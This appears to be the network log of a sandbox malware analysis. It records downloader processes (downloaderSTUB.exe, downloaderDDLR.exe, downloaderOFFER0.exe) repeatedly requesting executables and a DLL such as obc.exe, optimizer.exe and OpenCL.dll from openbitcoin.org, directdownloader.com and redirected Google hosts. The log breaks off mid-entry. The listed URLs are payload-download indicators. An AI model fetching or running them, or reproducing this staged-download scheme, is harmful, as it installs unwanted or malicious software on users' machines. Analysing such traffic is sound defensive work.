    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    Request
    GET /products.html/DirectDownloaderInstaller.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
  • GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 135
  • GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:50 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:50 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:51 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:51 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:52 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:52 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:52 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 135
  • GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 136
  • GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:58 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • GET
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    Request
    GET /products.html/toolbars/optimizer.exe HTTP/1.0
    Host: workspace.google.com
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Location: https://workspace.google.com/products.html/toolbars/optimizer.exe
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    X-Content-Type-Options: nosniff
    Server: sffe
    Content-Length: 262
    X-XSS-Protection: 0
    Date: Mon, 25 Dec 2023 10:59:37 GMT
    Expires: Mon, 25 Dec 2023 11:29:37 GMT
    Cache-Control: public, max-age=1800
    Content-Type: text/html; charset=UTF-8
    Age: 139
  • GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:59 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • GET
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    Request
    GET /static/dist/OpenCL.dll HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
    Response
    HTTP/1.0 301 Moved Permanently
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 25 Dec 2023 11:01:59 GMT
    Location: https://www.openbitcoin.org/static/dist/OpenCL.dll
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
  • GET
    http://www.openbitcoin.org/static/dist/obc.exe
    Request
    GET /static/dist/obc.exe HTTP/1.0
    Host: www.openbitcoin.org
    User-Agent: NSISDL/1.2 (Mozilla)
    Accept: */*
  • 162.255.119.249:80
    http://www.directdownloader.com/DirectDownloaderInstaller.exe
    http
    downloaderDDLR.exe
    356 B
    627 B
    5
    5

    HTTP Request

    GET http://www.directdownloader.com/DirectDownloaderInstaller.exe

    HTTP Response

    302
  • 216.239.32.21:80
    http://openbitcoin.org/static/dist/OpenCL.dll
    http
    downloaderSTUB.exe
    432 B
    754 B
    7
    6

    HTTP Request

    GET http://openbitcoin.org/static/dist/OpenCL.dll

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/obc.exe
    http
    downloaderSTUB.exe
    492 B
    612 B
    6
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/obc.exe

    HTTP Response

    301
  • 162.255.119.249:80
    http://www.directdownloader.com/toolbars/optimizer.exe
    http
    downloaderOFFER0.exe
    449 B
    609 B
    7
    5

    HTTP Request

    GET http://www.directdownloader.com/toolbars/optimizer.exe

    HTTP Response

    302
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    http
    downloaderSTUB.exe
    498 B
    615 B
    6
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/OpenCL.dll

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/obc.exe
    http
    downloaderSTUB.exe
    341 B
    612 B
    5
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/obc.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/obc.exe
    http
    downloaderSTUB.exe
    485 B
    1.1kB
    8
    6

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/obc.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/obc.exe
    http
    downloaderSTUB.exe
    393 B
    612 B
    6
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/obc.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    http
    downloaderSTUB.exe
    396 B
    615 B
    6
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/OpenCL.dll

    HTTP Response

    301
  • 142.250.200.4:80
    http://www.google.com/enterprise/apps/business/products.html/DirectDownloaderInstaller.exe
    http
    downloaderDDLR.exe
    385 B
    916 B
    5
    5

    HTTP Request

    GET http://www.google.com/enterprise/apps/business/products.html/DirectDownloaderInstaller.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/obc.exe
    http
    downloaderSTUB.exe
    544 B
    664 B
    7
    6

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/obc.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    http
    downloaderSTUB.exe
    344 B
    615 B
    5
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/OpenCL.dll

    HTTP Response

    301
  • 142.250.200.46:80
    http://enterprise.google.com/apps/business/products.html/DirectDownloaderInstaller.exe
    http
    downloaderDDLR.exe
    381 B
    880 B
    5
    5

    HTTP Request

    GET http://enterprise.google.com/apps/business/products.html/DirectDownloaderInstaller.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    http
    downloaderSTUB.exe
    344 B
    615 B
    5
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/OpenCL.dll

    HTTP Response

    301
  • 216.58.213.14:80
    http://gsuite.google.com/products.html/DirectDownloaderInstaller.exe
    http
    downloaderDDLR.exe
    363 B
    911 B
    5
    5

    HTTP Request

    GET http://gsuite.google.com/products.html/DirectDownloaderInstaller.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/obc.exe
    http
    downloaderSTUB.exe
    592 B
    608 B
    8
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/obc.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    http
    downloaderSTUB.exe
    344 B
    615 B
    5
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/OpenCL.dll

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    http
    downloaderSTUB.exe
    390 B
    615 B
    6
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/OpenCL.dll

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    http
    downloaderSTUB.exe
    344 B
    615 B
    5
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/OpenCL.dll

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    http
    downloaderSTUB.exe
    344 B
    615 B
    5
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/OpenCL.dll

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    http
    downloaderSTUB.exe
    344 B
    615 B
    5
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/OpenCL.dll

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    http
    downloaderSTUB.exe
    396 B
    615 B
    6
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/OpenCL.dll

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    http
    downloaderDDLR.exe
    366 B
    919 B
    5
    5

    HTTP Request

    GET http://workspace.google.com/products.html/DirectDownloaderInstaller.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    http
    downloaderDDLR.exe
    366 B
    919 B
    5
    5

    HTTP Request

    GET http://workspace.google.com/products.html/DirectDownloaderInstaller.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    http
    downloaderDDLR.exe
    418 B
    919 B
    6
    5

    HTTP Request

    GET http://workspace.google.com/products.html/DirectDownloaderInstaller.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    http
    downloaderSTUB.exe
    396 B
    615 B
    6
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/OpenCL.dll

    HTTP Response

    301
  • 142.250.200.4:80
    http://www.google.com/enterprise/apps/business/products.html/toolbars/optimizer.exe
    http
    downloaderOFFER0.exe
    378 B
    910 B
    5
    5

    HTTP Request

    GET http://www.google.com/enterprise/apps/business/products.html/toolbars/optimizer.exe

    HTTP Response

    301
  • 142.250.200.46:80
    http://enterprise.google.com/apps/business/products.html/toolbars/optimizer.exe
    http
    downloaderOFFER0.exe
    754 B
    967 B
    10
    7

    HTTP Request

    GET http://enterprise.google.com/apps/business/products.html/toolbars/optimizer.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    http
    downloaderDDLR.exe
    366 B
    919 B
    5
    5

    HTTP Request

    GET http://workspace.google.com/products.html/DirectDownloaderInstaller.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    http
    downloaderDDLR.exe
    366 B
    919 B
    5
    5

    HTTP Request

    GET http://workspace.google.com/products.html/DirectDownloaderInstaller.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    http
    downloaderDDLR.exe
    510 B
    919 B
    8
    5

    HTTP Request

    GET http://workspace.google.com/products.html/DirectDownloaderInstaller.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    http
    downloaderSTUB.exe
    498 B
    615 B
    6
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/OpenCL.dll

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    http
    downloaderSTUB.exe
    498 B
    615 B
    6
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/OpenCL.dll

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    http
    downloaderSTUB.exe
    344 B
    615 B
    5
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/OpenCL.dll

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    http
    downloaderDDLR.exe
    510 B
    1.7kB
    8
    7

    HTTP Request

    GET http://workspace.google.com/products.html/DirectDownloaderInstaller.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    http
    downloaderSTUB.exe
    396 B
    615 B
    6
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/OpenCL.dll

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    http
    downloaderDDLR.exe
    594 B
    971 B
    7
    6

    HTTP Request

    GET http://workspace.google.com/products.html/DirectDownloaderInstaller.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    http
    downloaderDDLR.exe
    366 B
    879 B
    5
    4

    HTTP Request

    GET http://workspace.google.com/products.html/DirectDownloaderInstaller.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    http
    downloaderDDLR.exe
    366 B
    919 B
    5
    5

    HTTP Request

    GET http://workspace.google.com/products.html/DirectDownloaderInstaller.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    http
    downloaderDDLR.exe
    366 B
    919 B
    5
    5

    HTTP Request

    GET http://workspace.google.com/products.html/DirectDownloaderInstaller.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    http
    downloaderDDLR.exe
    412 B
    919 B
    6
    5

    HTTP Request

    GET http://workspace.google.com/products.html/DirectDownloaderInstaller.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    http
    downloaderDDLR.exe
    418 B
    920 B
    6
    5

    HTTP Request

    GET http://workspace.google.com/products.html/DirectDownloaderInstaller.exe

    HTTP Response

    301
  • 216.58.213.14:80
    http://gsuite.google.com/products.html/toolbars/optimizer.exe
    http
    downloaderOFFER0.exe
    356 B
    906 B
    5
    5

    HTTP Request

    GET http://gsuite.google.com/products.html/toolbars/optimizer.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    http
    downloaderOFFER0.exe
    528 B
    906 B
    6
    5

    HTTP Request

    GET http://workspace.google.com/products.html/toolbars/optimizer.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    http
    downloaderOFFER0.exe
    451 B
    906 B
    7
    5

    HTTP Request

    GET http://workspace.google.com/products.html/toolbars/optimizer.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    http
    downloaderOFFER0.exe
    632 B
    958 B
    8
    6

    HTTP Request

    GET http://workspace.google.com/products.html/toolbars/optimizer.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    http
    downloaderSTUB.exe
    390 B
    655 B
    6
    6

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/OpenCL.dll

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/obc.exe
    http
    downloaderSTUB.exe
    485 B
    652 B
    8
    6

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/obc.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    http
    downloaderSTUB.exe
    344 B
    615 B
    5
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/OpenCL.dll

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    http
    downloaderSTUB.exe
    390 B
    615 B
    6
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/OpenCL.dll

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    http
    downloaderSTUB.exe
    344 B
    615 B
    5
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/OpenCL.dll

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    http
    downloaderDDLR.exe
    458 B
    960 B
    7
    6

    HTTP Request

    GET http://workspace.google.com/products.html/DirectDownloaderInstaller.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    http
    downloaderSTUB.exe
    344 B
    615 B
    5
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/OpenCL.dll

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    http
    downloaderDDLR.exe
    366 B
    920 B
    5
    5

    HTTP Request

    GET http://workspace.google.com/products.html/DirectDownloaderInstaller.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    http
    downloaderSTUB.exe
    344 B
    615 B
    5
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/OpenCL.dll

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    http
    downloaderDDLR.exe
    366 B
    920 B
    5
    5

    HTTP Request

    GET http://workspace.google.com/products.html/DirectDownloaderInstaller.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    http
    downloaderDDLR.exe
    366 B
    920 B
    5
    5

    HTTP Request

    GET http://workspace.google.com/products.html/DirectDownloaderInstaller.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    http
    downloaderDDLR.exe
    418 B
    920 B
    6
    5

    HTTP Request

    GET http://workspace.google.com/products.html/DirectDownloaderInstaller.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    http
    downloaderSTUB.exe
    396 B
    615 B
    6
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/OpenCL.dll

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/obc.exe
    http
    downloaderSTUB.exe
    393 B
    612 B
    6
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/obc.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    http
    downloaderDDLR.exe
    542 B
    920 B
    6
    5

    HTTP Request

    GET http://workspace.google.com/products.html/DirectDownloaderInstaller.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    http
    downloaderSTUB.exe
    344 B
    615 B
    5
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/OpenCL.dll

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    http
    downloaderDDLR.exe
    366 B
    920 B
    5
    5

    HTTP Request

    GET http://workspace.google.com/products.html/DirectDownloaderInstaller.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/DirectDownloaderInstaller.exe
    http
    downloaderDDLR.exe
    418 B
    920 B
    6
    5

    HTTP Request

    GET http://workspace.google.com/products.html/DirectDownloaderInstaller.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    http
    downloaderSTUB.exe
    390 B
    615 B
    6
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/OpenCL.dll

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    http
    downloaderOFFER0.exe
    359 B
    906 B
    5
    5

    HTTP Request

    GET http://workspace.google.com/products.html/toolbars/optimizer.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    http
    downloaderOFFER0.exe
    405 B
    906 B
    6
    5

    HTTP Request

    GET http://workspace.google.com/products.html/toolbars/optimizer.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    http
    downloaderSTUB.exe
    344 B
    615 B
    5
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/OpenCL.dll

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    http
    downloaderOFFER0.exe
    359 B
    906 B
    5
    5

    HTTP Request

    GET http://workspace.google.com/products.html/toolbars/optimizer.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    http
    downloaderOFFER0.exe
    528 B
    906 B
    6
    5

    HTTP Request

    GET http://workspace.google.com/products.html/toolbars/optimizer.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/OpenCL.dll
    http
    downloaderSTUB.exe
    396 B
    615 B
    6
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/OpenCL.dll

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    http
    downloaderOFFER0.exe
    580 B
    958 B
    7
    6

    HTTP Request

    GET http://workspace.google.com/products.html/toolbars/optimizer.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    http
    downloaderOFFER0.exe
    451 B
    946 B
    7
    6

    HTTP Request

    GET http://workspace.google.com/products.html/toolbars/optimizer.exe

    HTTP Response

    301
  • 172.217.169.14:80
    http://workspace.google.com/products.html/toolbars/optimizer.exe
    http
    downloaderOFFER0.exe
    626 B
    906 B
    8
    5

    HTTP Request

    GET http://workspace.google.com/products.html/toolbars/optimizer.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/obc.exe
    http
    downloaderSTUB.exe
    341 B
    612 B
    5
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/obc.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/obc.exe
    http
    downloaderSTUB.exe
    341 B
    612 B
    5
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/obc.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/obc.exe
    http
    downloaderSTUB.exe
    341 B
    612 B
    5
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/obc.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/obc.exe
    http
    downloaderSTUB.exe
    341 B
    612 B
    5
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/obc.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/obc.exe
    http
    downloaderSTUB.exe
    341 B
    612 B
    5
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/obc.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/obc.exe
    http
    downloaderSTUB.exe
    341 B
    612 B
    5
    5

    HTTP Request

    GET http://www.openbitcoin.org/static/dist/obc.exe

    HTTP Response

    301
  • 142.250.180.19:80
    http://www.openbitcoin.org/static/dist/obc.exe
    http
